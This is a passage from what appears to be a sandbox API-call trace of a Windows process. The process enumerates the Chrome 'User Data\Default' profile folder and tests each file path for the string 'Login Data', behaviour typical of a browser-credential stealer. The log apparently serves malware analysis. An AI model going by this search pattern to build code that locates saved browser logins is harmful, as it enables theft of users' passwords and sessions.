0x1c [0161.447] GetProcessHeap () returned 0x8e0000 [0161.447] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925600 | out: hHeap=0x8e0000) returned 1 [0161.447] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.447] GetProcessHeap () returned 0x8e0000 [0161.447] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0161.447] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d406e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d406e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d1e730, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0161.447] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.447] lstrlenW (lpString="\\") returned 1 [0161.447] GetProcessHeap () returned 0x8e0000 [0161.447] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.447] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.447] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.447] lstrlenW (lpString="Cookies") returned 7 [0161.447] GetProcessHeap () returned 0x8e0000 [0161.447] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa8) returned 0x925550 [0161.447] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" [0161.447] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.447] GetProcessHeap () returned 0x8e0000 [0161.447] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.447] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", lpSrch="Login Data") returned 0x0 [0161.447] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.447] GetProcessHeap () returned 0x8e0000 [0161.447] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0161.447] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d66840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d66840, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d44890, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies-journal", cAlternateFileName="COOKIE~1")) returned 1 [0161.447] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.447] lstrlenW (lpString="\\") returned 1 [0161.447] GetProcessHeap () returned 0x8e0000 [0161.447] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.447] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.447] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.448] lstrlenW (lpString="Cookies-journal") returned 15 [0161.448] GetProcessHeap () returned 0x8e0000 [0161.448] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925550 [0161.448] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Cookies-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" [0161.448] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.448] GetProcessHeap () returned 0x8e0000 [0161.448] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.448] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal", lpSrch="Login Data") returned 0x0 [0161.448] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.448] GetProcessHeap () returned 0x8e0000 [0161.448] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0161.448] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83b08a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x83b08a50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0b57b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Current Session", cAlternateFileName="CURREN~1")) returned 1 [0161.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.448] lstrlenW (lpString="\\") returned 1 [0161.448] GetProcessHeap () returned 0x8e0000 [0161.448] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.448] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.448] lstrlenW (lpString="Current Session") returned 15 [0161.448] GetProcessHeap () returned 0x8e0000 [0161.448] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925550 [0161.448] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Current Session" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" [0161.448] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.448] GetProcessHeap () returned 0x8e0000 [0161.448] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.448] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session", lpSrch="Login Data") returned 0x0 [0161.448] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.448] GetProcessHeap () returned 0x8e0000 [0161.448] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0161.448] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c3b6860, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c3b6860, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c3b8f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x126, dwReserved0=0x0, dwReserved1=0x0, cFileName="Current Tabs", cAlternateFileName="CURREN~2")) returned 1 [0161.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.448] lstrlenW (lpString="\\") returned 1 [0161.449] GetProcessHeap () returned 0x8e0000 [0161.449] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.449] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.449] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.449] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.449] lstrlenW (lpString="Current Tabs") returned 12 [0161.449] GetProcessHeap () returned 0x8e0000 [0161.449] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925550 [0161.449] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.449] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Current Tabs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" [0161.449] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.449] GetProcessHeap () returned 0x8e0000 [0161.449] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.449] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs", lpSrch="Login Data") returned 0x0 [0161.449] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.449] GetProcessHeap () returned 0x8e0000 [0161.449] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0161.449] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_reduction_proxy_leveldb", cAlternateFileName="DATA_R~1")) returned 1 [0161.449] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2=".") returned 1 [0161.449] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="..") returned 1 [0161.449] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.449] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.449] lstrlenW (lpString="\\") returned 1 [0161.449] GetProcessHeap () returned 0x8e0000 [0161.449] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.449] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.449] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.449] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.449] lstrlenW (lpString="data_reduction_proxy_leveldb") returned 28 [0161.449] GetProcessHeap () returned 0x8e0000 [0161.449] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x925550 [0161.449] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.449] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0161.449] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.450] GetProcessHeap () returned 0x8e0000 [0161.450] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.450] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0161.450] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0161.450] lstrlenW (lpString="\\*.*") returned 4 [0161.450] GetProcessHeap () returned 0x8e0000 [0161.450] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x925630 [0161.450] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0161.450] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*" [0161.450] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.451] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.451] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.451] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.452] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.452] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80916060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0161.452] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0161.452] lstrlenW (lpString="\\") returned 1 [0161.452] GetProcessHeap () returned 0x8e0000 [0161.452] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0161.452] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0161.452] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.452] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0161.452] lstrlenW (lpString="000003.log") returned 10 [0161.452] GetProcessHeap () returned 0x8e0000 [0161.452] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xe8) returned 0x9257f8 [0161.452] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.452] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="000003.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" [0161.452] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.452] GetProcessHeap () returned 0x8e0000 [0161.452] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0161.452] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", lpSrch="Login Data") returned 0x0 [0161.452] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.452] GetProcessHeap () returned 0x8e0000 [0161.452] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0161.452] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x804795c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, 